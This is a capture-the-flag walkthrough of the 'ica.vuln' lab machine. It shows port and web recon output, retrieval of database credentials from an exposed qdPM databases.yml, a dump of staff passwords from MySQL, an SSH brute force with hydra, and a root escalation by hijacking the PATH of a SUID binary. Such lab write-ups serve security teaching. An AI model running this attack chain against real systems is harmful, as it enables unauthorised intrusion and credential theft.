Port recognition withnmapor you can use recon

┌──(root@ghost)-[/home/ghost]
└─# recon ica.vuln

    .o oOOOOOOOo                                            OOOo
    Ob.OOOOOOOo  OOOo.      oOOo.                      .adOOOOOOO
    OboO"""""""""""".OOo. .oOOOOOo.    OOOo.oOOOOOo.."""""""""'OO
    OOP.oOOOOOOOOOOO "POOOOOOOOOOOo.   `"OOOOOOOOOP,OOOOOOOOOOOB'
    `O'OOOO'     `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO'    `OOOOo
    .OOOO'            `OOOOOOOOOOOOOOOOOOOOOOOOOO'            `OO
    OOOOO                 '"OOOOOOOOOOOOOOOO"`                oOO
   oOOOOOba.                .adOOOOOOOOOOba               .adOOOOo.
  oOOOOOOOOOOOOOba.    .adOOOOOOOOOO@^OOOOOOOba.     .adOOOOOOOOOOOO
 OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"`  '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO
 "OOOO"       "YOoOOOOMOIONODOO"`  .   '"OOROAOPOEOOOoOY"     "OOO"
    Y           'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?'         :`
    :            .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO?         .
    .            oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo
                 '%o  OOOO"%OOOO%"%OOOOO"OOOOOO"OOO':
                      `$"  `OOOO' `O"Y ' `OOOO'  o             .
    .                  .     OP"          : o     .
                              :
                              .

[R3C0N] by 0bfxgh0st 4 WWA with ❤
[OS] Linux (99%)
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-20 11:14 EST
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 11:14
Completed NSE at 11:14, 0.00s elapsed
Initiating ARP Ping Scan at 11:14
Scanning ica.vuln (10.0.2.48) [1 port]
Completed ARP Ping Scan at 11:14, 0.03s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 11:14
Scanning ica.vuln (10.0.2.48) [65535 ports]
Discovered open port 80/tcp on 10.0.2.48
Discovered open port 3306/tcp on 10.0.2.48
Discovered open port 22/tcp on 10.0.2.48
Discovered open port 33060/tcp on 10.0.2.48
Completed SYN Stealth Scan at 11:14, 1.51s elapsed (65535 total ports)
NSE: Script scanning 10.0.2.48.
Initiating NSE at 11:14
Completed NSE at 11:14, 0.00s elapsed
Nmap scan report for ica.vuln (10.0.2.48)
Host is up (0.000066s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
3306/tcp  open  mysql
33060/tcp open  mysqlx
MAC Address: 08:00:27:61:B2:CD (Oracle VirtualBox virtual NIC)

NSE: Script Post-scanning.
Initiating NSE at 11:14
Completed NSE at 11:14, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 1.77 seconds
           Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)


[i] [WHATWEB]
http://ica.vuln:80 [200 OK] Apache[2.4.48], Bootstrap, Cookies[qdPM8], Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache/2.4.48 (Debian)], IP[10.0.2.48], JQuery[1.10.2], PasswordField[login[password]], Script[text/javascript], Title[qdPM | Login], X-UA-Compatible[IE=edge]

[+] [WFUZZ]
*stage 1 --> (light web path fuzzing wordlist:/usr/share/dirb/wordlists/common.txt)
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://ica.vuln:80/FUZZ
Total requests: 4614

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                      
=====================================================================

000000013:   403        9 L      28 W       273 Ch      ".htpasswd"                                                                  
000000568:   301        9 L      28 W       306 Ch      "backups"                                                                    
000000598:   301        9 L      28 W       304 Ch      "batch"                                                                      
000001053:   301        9 L      28 W       303 Ch      "core"                                                                       
000001114:   301        9 L      28 W       302 Ch      "css"                                                                        
000000012:   403        9 L      28 W       273 Ch      ".htaccess"                                                                  
000001575:   200        0 L      3 W        884 Ch      "favicon.ico"                                                                
000000011:   403        9 L      28 W       273 Ch      ".hta"                                                                       
000001991:   301        9 L      28 W       305 Ch      "images"                                                                     
000002021:   200        145 L    373 W      5660 Ch     "index.php"                                                                  
000002058:   301        9 L      28 W       306 Ch      "install"                                                                    
000002145:   301        9 L      28 W       309 Ch      "javascript"                                                                 
000002179:   301        9 L      28 W       301 Ch      "js"                                                                         
000000001:   200        145 L    373 W      5651 Ch     "http://ica.vuln:80/"                                                        
000002441:   301        9 L      28 W       305 Ch      "manual"                                                                     
000003436:   200        2 L      3 W        26 Ch       "robots.txt"                                                                 
000003588:   403        9 L      28 W       273 Ch      "server-status"                                                              
000003613:   301        9 L      28 W       301 Ch      "sf"                                                                         
000003994:   301        9 L      28 W       307 Ch      "template"                                                                   
000004216:   301        9 L      28 W       306 Ch      "uploads"                                                                    

Total time: 0
Processed Requests: 4614
Filtered Requests: 4594
Requests/sec.: 0

*stage 2 --> (light permutated extensions fuzzing wordlist:/usr/share/dirb/wordlists/common.txt)
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://ica.vuln:80/FUZZ.FUZ2Z
Total requests: 13842

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                      
=====================================================================

000000032:   403        9 L      28 W       273 Ch      ".hta - html"                                                                
000000034:   403        9 L      28 W       273 Ch      ".htaccess - php"                                                            
000000031:   403        9 L      28 W       273 Ch      ".hta - php"                                                                 
000000001:   403        9 L      28 W       273 Ch      "php"                                                                        
000000036:   403        9 L      28 W       273 Ch      ".htaccess - txt"                                                            
000000037:   403        9 L      28 W       273 Ch      ".htpasswd - php"                                                            
000000035:   403        9 L      28 W       273 Ch      ".htaccess - html"                                                           
000000039:   403        9 L      28 W       273 Ch      ".htpasswd - txt"                                                            
000000038:   403        9 L      28 W       273 Ch      ".htpasswd - html"                                                           
000000033:   403        9 L      28 W       273 Ch      ".hta - txt"                                                                 
000000002:   403        9 L      28 W       273 Ch      "html"                                                                       
000002563:   200        0 L      0 W        0 Ch        "check - php"                                                                
000006049:   200        145 L    373 W      5660 Ch     "index - php"                                                                
000009879:   200        12 L     68 W       470 Ch      "readme - txt"                                                               
000010305:   200        2 L      3 W        26 Ch       "robots - txt"                                                               

Total time: 0
Processed Requests: 13842
Filtered Requests: 13827
Requests/sec.: 0

recon reports port 22 for ssh, 80 for http, 3306 for mysql and 33060 for mysqlx. Whatweb show us what technology run in the webserver

┌──(root@ghost)-[/home/ghost]
└─# searchsploit qdPM 9.2
------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                              |  Path
------------------------------------------------------------------------------------------------------------ ---------------------------------
qdPM 9.2 - Password Exposure (Unauthenticated)                                                              | php/webapps/50176.txt
------------------------------------------------------------------------------------------------------------ ---------------------------------
┌──(root@ghost)-[/home/ghost]
└─# cat /usr/share/exploitdb/exploits/php/webapps/50176.txt
...
The password and connection string for the database are stored in a yml file. To access the yml file you can go to http://<website>/core/config/databases.yml file and download.

There is a public exploit for qdPM 9.2, but we can find databases.yml file by navigating through indexed files in /core/config folder

┌──(root@ghost)-[/home/ghost]
└─# curl http://ica.vuln/core/config/databases.yml
all:
  doctrine:
    class: sfDoctrineDatabase
    param:
      dsn: 'mysql:dbname=qdpm;host=localhost'
      profiler: false
      username: qdpmadmin
      password: "<?php echo urlencode('UcVQCMQk2STVeS6J') ; ?>"
      attributes:
        quote_identifier: true

It seems that we have some credentials for mysql service

┌──(root@ghost)-[/home/ghost]
└─# mysql -u qdpmadmin -p -h ica.vuln
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 16
Server version: 8.0.26 MySQL Community Server - GPL

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| qdpm               |
| staff              |
| sys                |
+--------------------+
6 rows in set (0.007 sec)

MySQL [(none)]> 

We are on the database time to inspect

MySQL [staff]> select name from staff.user;
+--------+
| name   |
+--------+
| Smith  |
| Lucas  |
| Travis |
| Dexter |
| Meyer  |
+--------+
5 rows in set (0.001 sec)

MySQL [staff]> select password from staff.login;
+--------------------------+
| password                 |
+--------------------------+
| c3VSSkFkR3dMcDhkeTNyRg== |
| N1p3VjRxdGc0MmNtVVhHWA== |
| WDdNUWtQM1cyOWZld0hkQw== |
| REpjZVZ5OThXMjhZN3dMZw== |
| Y3FObkJXQ0J5UzJEdUpTeQ== |
+--------------------------+
5 rows in set (0.001 sec)

MySQL [staff]> 

We obtained some users and base64 encoded passwords

┌──(root@ghost)-[/home/ghost]
└─# cat users.txt
smith
lucas
travis
dexter
meyer
┌──(root@ghost)-[/home/ghost]
└─# cat pass.txt
suRJAdGwLp8dy3rF
7ZwV4qtg42cmUXGX
X7MQkP3W29fewHdC
DJceVy98W28Y7wLg
cqNnBWCByS2DuJSy

After decoding base64 passwords we created two files to bruteforce ssh service

┌──(root@ghost)-[/home/ghost]
└─# hydra -L users.txt -P pass.txt ica.vuln ssh -t 4
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-12-20 12:15:51
[DATA] max 4 tasks per 1 server, overall 4 tasks, 25 login tries (l:5/p:5), ~7 tries per task
[DATA] attacking ssh://ica.vuln:22/
[22][ssh] host: ica.vuln   login: travis   password: DJceVy98W28Y7wLg
[22][ssh] host: ica.vuln   login: dexter   password: 7ZwV4qtg42cmUXGX
1 of 1 target successfully completed, 2 valid passwords found

We found two valid users to log through ssh

┌──(root@ghost)-[/home/ghost]
└─# ssh travis@ica.vuln
The authenticity of host 'ica.vuln (10.0.2.48)' can't be established.
ED25519 key fingerprint is SHA256:xCJPzSxRekyYT6eXmyzAXdY7uAlP5b7vQp+B5XqYsfE.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'ica.vuln' (ED25519) to the list of known hosts.
travis@ica.vuln's password: 
Linux debian 5.10.0-8-amd64 #1 SMP Debian 5.10.46-5 (2021-09-23) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Sep 25 14:55:01 2021 from 192.168.1.7
travis@debian:~$ cat user.txt
ICA{Secret_Project}

We are in the system now as travis user, we can do user pivoting with dexter and the other password but is not relevant to get root

travis@debian:~$ find / -perm /4000 2>/dev/null
/opt/get_access
/usr/bin/chfn
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/su
/usr/bin/mount
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper

Let's check /opt/get_access

travis@debian:~$ ls -la /opt/get_access
-rwsr-xr-x 1 root root 16816 Sep 25  2021 /opt/get_access
travis@debian:~$ strings /opt/get_access
/lib64/ld-linux-x86-64.so.2
setuid
socket
puts
system
__cxa_finalize
setgid
__libc_start_main
libc.so.6
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u/UH
[]A\A]A^A_
cat /root/system.info
Could not create socket to access to the system.
All services are disabled. Accessing to the system is allowed only within working hours.
;*3$"
GCC: (Debian 10.2.1-6) 10.2.1 20210110
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
...

We can see a setuid call, system call and cat command to a file in root folder

travis@debian:~$ echo '/bin/bash' > /tmp/cat && chmod +x /tmp/cat
travis@debian:~$ export PATH=/tmp:$PATH
travis@debian:~$ /opt/get_access
root@debian:~# more /root/root.txt
ICA{Next_Generation_Self_Renewable_Genetics

After abusing suid binary we will get root